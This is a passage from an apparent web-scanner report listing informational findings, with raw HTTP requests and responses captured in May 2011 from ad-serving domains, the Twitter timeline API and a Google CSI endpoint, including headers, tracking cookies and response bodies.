rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; vsd=0@1@4dcbc6b1@cdn.turn.com

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:32:09 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRn28y%2BQcHcyYv5R%2FmFGtYy51L1sktb2LxO%2F4Tin90n5ZmnDVxZPInODp4jveykMoZmShev4kqgsDPj0u2cH5typzQat%2BzzalyK0Fs1ZTxmINfa2Gh3Zz46IWxlEVrOxJRdzv0tMj7iIi32Vgr7bxGE16CaSBSQF%2Fc4ACSgroRo9RB%2BLni93g%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:32:09 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Thu, 12-May-2011 13:32:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
11.5. http://adserving2.cpxinteractive.com/st  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Request 1

GET /st?ad_type=iframe&ad_size=300x250&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:32:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:32:25 GMT
Content-Length: 658

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565"></scr'+'ipt>');</script><p><noscript><a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=1588565&t=2" target="parent"><img border="0" src="http://ad.yieldmanager.com/imp?Z=300x250&s=1588565&t=2"></img></a></noscript></p>

Request 2

GET /st?ad_type=iframe&ad_size=300x250&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:32:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:32:39 GMT
Content-Length: 525

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1588565&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565"></scr'+'ipt>');</script><p><noscript><a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=1588565&t=2" target="parent"><img border="0" src="http://ad.yieldmanager.com/imp?Z=300x250&s=1588565&t=2"></img></a></noscript></p>
11.6. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Request 1

GET /1/statuses/user_timeline.json?screen_name=reganlee&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1305207062912=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1304617828.1304721594.4; k=173.193.214.243.1305161327073854

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305207166-55904-42371
X-RateLimit-Limit: 150
ETag: "f16b5231d379a8faccd3bcb746c7a175"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 13:32:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01698
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 0ea1ebd7e3c3292a1466a749293e9011989f70f4
X-RateLimit-Reset: 1305210664
Set-Cookie: original_referer=Vs%2BEmu1btvuAmQsknyZNdVheq0tL9VpNzq2cJ7f%2Frku5HhKsM0INw8sY%2FgQVZoF0ZSkQVzHgBByWAa84JbboQ%2FY%2BxV5zsEAQMgn2qZyQ36Y%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK3WaOQvAToHaWQiJWUxNWMxZGZmNGM4NjYx%250AN2Q1NGM2MzhmNzhiM2MxODMzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa39a0ccad9bf49b70a696e63158d18af30456d6; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 7125

TWTR.Widget.receiveCallback_1([{"text":"Review of book Insight http:\/\/orangeorbreview.blogspot.com\/2011\/05\/book-review-insight.html","id_str":"68512311291289601","created_at":"Thu May 12 03:06:22 +0000 2011","in_reply_to_user_id":null,"favorited":false,"truncated":false,"retweet_count":0,"source":"web","in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"in_reply_to_status_id":null,"contributors":null,"geo":null,"retweeted":false,"in_reply_to_user_id_str":null,"place":null,"coordinates":null,"user":{"contributors_enabled":false,"statuses_count":773,"id_str":"15834047","following":true,"verified":false,"created_at":"Wed Aug 13 07:14:37 +0000 2008","profile_text_color":"5a15e6","description":"Fortean and esoteric researcher, writer, in UFO Magazine, Blog on LOWFI, BoA, Crypto Squad USA, Orange Orb, UFO Mary, Vintage UFO, Mothman Flutterings,","default_profile_image":false,"profile_sidebar_fill_color":"000000","followers_count":275,"geo_enabled":true,"profile_background_tile":true,"friends_count":205,"profile_image_url":"http:\/\/a0.twimg.com\/profile_images\/308107749\/Photo_46_normal.jpg","follow_request_sent":false,"time_zone":"Pacific Time (US & Canada)","profile_link_color":"bd08ff","screen_name":"reganlee","show_all_inline_media":false,"profile_sidebar_border_color":"120112","default_profile":false,"lang":"en","protected":false,"is_translator":false,"profile_use_background_image":true,"favourites_count":3,"location":"Oregon","name":"Regan Lee","listed
...[SNIP]...

Request 2

GET /1/statuses/user_timeline.json?screen_name=reganlee&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1305207062912=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1304617828.1304721594.4; k=173.193.214.243.1305161327073854

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305207174-28234-9620
X-RateLimit-Limit: 150
ETag: "f16b5231d379a8faccd3bcb746c7a175"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 13:32:54 GMT
X-RateLimit-Remaining: 122
X-Runtime: 0.01963
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 31c2a55fd248c944835e6c1723e52ab837c30b4b
X-RateLimit-Reset: 1305210664
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEn1aOQvAToHaWQiJTA2YzQ1NzQxMDdjMDFh%250ANGJkNTM4NDkzZDQ3YTllYmI4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--1d63b430fa4633a830d445fa2369491e0d447e3b; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 7125

TWTR.Widget.receiveCallback_1([{"text":"Review of book Insight http:\/\/orangeorbreview.blogspot.com\/2011\/05\/book-review-insight.html","id_str":"68512311291289601","created_at":"Thu May 12 03:06:22 +0000 2011","in_reply_to_user_id":null,"favorited":false,"truncated":false,"retweet_count":0,"source":"web","in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"in_reply_to_status_id":null,"contributors":null,"geo":null,"retweeted":false,"in_reply_to_user_id_str":null,"place":null,"coordinates":null,"user":{"contributors_enabled":false,"statuses_count":773,"id_str":"15834047","following":true,"verified":false,"created_at":"Wed Aug 13 07:14:37 +0000 2008","profile_text_color":"5a15e6","description":"Fortean and esoteric researcher, writer, in UFO Magazine, Blog on LOWFI, BoA, Crypto Squad USA, Orange Orb, UFO Mary, Vintage UFO, Mothman Flutterings,","default_profile_image":false,"profile_sidebar_fill_color":"000000","followers_count":275,"geo_enabled":true,"profile_background_tile":true,"friends_count":205,"profile_image_url":"http:\/\/a0.twimg.com\/profile_images\/308107749\/Photo_46_normal.jpg","follow_request_sent":false,"time_zone":"Pacific Time (US & Canada)","profile_link_color":"bd08ff","screen_name":"reganlee","show_all_inline_media":false,"profile_sidebar_border_color":"120112","default_profile":false,"lang":"en","protected":false,"is_translator":false,"profile_use_background_image":true,"favourites_count":3,"location":"Oregon","name":"Regan Lee","listed_count":13,"profile_background_color":"642D8B","id":15834047,"notifications":false,"profile_background_image_url":"http:\/\/a3.twimg.com\/profile_background_im
...[SNIP]...
11.7. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Request 1

GET /click/bstats.gif?bapid=6388&uid=768910&kid=43105999 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AXZHbkoMgEET%2FhWceAEWt%2FE2Md24CitGQfw%2BQ3Vrd1zPdPdM1L%2BAIuL0Aa%2FdNmcaCGzAbF6vHWtiy9NgjGIGNYC6bBB7DUPUa3V2AvF%2BEJ76GdhxlFlU1SjaPJ4aiVlJG6NJ%2FR23QkgZqnR1bIFVmeCCYBh0vxp1OgZrccfWzKJk7dTH%2FUnGhlrecB1Ivm%2FKlL%2BoMznKzLuVZdMmT%2F%2FLi6iKPtEErP3cc5gCPafgWn59Oh7HBk8sTsCxbokJoiVPpXCj0Z1ZnsxFKpiK6qc7XjPTag1gTsua9k9LfPcbLAW3VFSLupdPzfF1LonVA%2FSmvKB%2FXPIbJmryMRhmAoL5L2ZoxfRu83x8%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Thu, 12 May 2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /click/bstats.gif?bapid=6388&uid=768910&kid=43105999 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AXZHbkoMgEET%2FhWceAEWt%2FE2Md24CitGQfw%2BQ3Vrd1zPdPdM1L%2BAIuL0Aa%2FdNmcaCGzAbF6vHWtiy9NgjGIGNYC6bBB7DUPUa3V2AvF%2BEJ76GdhxlFlU1SjaPJ4aiVlJG6NJ%2FR23QkgZqnR1bIFVmeCCYBh0vxp1OgZrccfWzKJk7dTH%2FUnGhlrecB1Ivm%2FKlL%2BoMznKzLuVZdMmT%2F%2FLi6iKPtEErP3cc5gCPafgWn59Oh7HBk8sTsCxbokJoiVPpXCj0Z1ZnsxFKpiK6qc7XjPTag1gTsua9k9LfPcbLAW3VFSLupdPzfF1LonVA%2FSmvKB%2FXPIbJmryMRhmAoL5L2ZoxfRu83x8%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Thu, 12-May-2011 13:33:36 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Thu, 12 May 2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
11.8. http://csi.gstatic.com/csi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://csi.gstatic.com
Path:   /csi

Request 1

GET /csi?v=3&s=opensocial-gadgets&action=peoplesense_profile&srt=6760&tran=0&gadget=http%3A%2F%2Ffcgadgets.appspot.com%2Fspec%2Fshareit.xml&container=peoplesense&view=profile&ClickTrackGadgetRewriter=false&CsiSample=true&ContentDivGadgetRewriter=false&StyleAdjacencyGadgetRewriter=true&HtmlParser=control&DflagsJsDebugGadgetRewriter=true&ResourceUsageJsDebugGadgetRewriter=true&JsSubVersion=control&YtVideoUrlGadgetRewriter=true&GadgetBlacklist=control&LogResources=false&DynamicHeightGadgetRewriter=true&StyleTagExtractorGadgetRewriter=true&ErrorCodesToLog=control&AdsUrlGadgetRewriter=true&MiniMessageGadgetRewriter=true&Monkeypatch=control&ProxyingGadgetRewriter=true&TimeSecsSinceEpochEnvGadgetRewriter=true&TrackResources=false&UseETags=false&UseUrlGadgetWhitelist=false&AnalyticsGadgetRewriter=true&GmailSkinsGadgetRewriter=true&e=CsiSample,StyleAdjacencyGadgetRewriter,DflagsJsDebugGadgetRewriter,ResourceUsageJsDebugGadgetRewriter,YtVideoUrlGadgetRewriter,DynamicHeightGadgetRewriter,StyleTagExtractorGadgetRewriter,AdsUrlGadgetRewriter,MiniMessageGadgetRewriter,ProxyingGadgetRewriter,TimeSecsSinceEpochEnvGadgetRewriter,AnalyticsGadgetRewriter,GmailSkinsGadgetRewriter&rt=ol.57947,prt.57947 HTTP/1.1
Host: csi.gstatic.com
Proxy-Connection: keep-alive
Referer: http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23ffffff%22,%22ENDCAP_LINK_COLOR%22:%22%23ffc619%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_TEXT_COLOR%22:%22%23ffffff%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_